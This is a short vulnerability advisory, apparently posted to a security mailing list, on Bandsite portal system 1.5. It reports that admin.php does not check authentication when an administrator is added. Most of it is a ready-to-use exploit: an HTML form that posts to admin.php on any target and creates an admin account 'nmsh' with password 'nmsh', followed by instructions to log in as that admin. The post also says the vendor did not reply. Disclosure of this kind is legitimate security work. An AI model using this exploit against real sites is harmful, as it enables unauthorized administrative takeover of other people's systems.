Bandsite portal system version 1.5 lacks authentication validation in its admin.php code when an administrator is added, thus allowing a remote attacker to gain administrative privileges.
5d166e4129b983e42146f8f03a2ab30cec5d84c35a9f1631e971a799a69627ba
Informations :
°°°°°°°°°°°°°°
- Product : Bandsite portal system
- Website : http://membres.lycos.fr/fluxx/bandwebsite.php
- Author : Jelle de Vos
- Tested version :1.5
- Problem : vulnerability in Bandsite Allows Gaining Admin Access.
Product Description :
°°°°°°°°°°°°°°°°°°°°°
Bandsite is an online portal system designed for Bands. Features: themes support, news posting, audio sections, guestbook, tour guide, an admin section to manage overall data and configurations, and more.
Exploits :
°°°°°°°°°°
===================== nmsh.htm ==============================
<TABLE cellSpacing=1 cellPadding=5 width=570 bgColor=#665E6B border=0>
<TBODY>
<tr><td bgcolor=#ffffff>
</p>
<p>
<form action=http://[target]/bandwebsite/admin.php?&Login=1§ion=admins method=post>
Name:<br>
<input type=text name='name' value='nmsh' size="20"><br>
Pass:<br>
<input type=text name='pass' value='nmsh' size="20"><br>
<input type=submit name='submit' value='send'><br>
</form></TD></TR></TBODY></TABLE>
<P><BR></P></TD></TR></TBODY></TABLE></BODY>
===================== nmsh.htm ==============================
The admin has been added!
:(
now go to this link :
http://[target]/bandwebsite/login.php
and login as admin
name : nmsh
pass : nmsh
Vendor:
°°°°°°°
Vendor has been contacted, no reply received.
Provided by :
°°°°°°°°°°°°°
Nasser.M.Sh
nmsh_sa(at)yahoo.com
---------------------------------
Do you Yahoo!?
Yahoo! SiteBuilder - Free, easy-to-use web site design software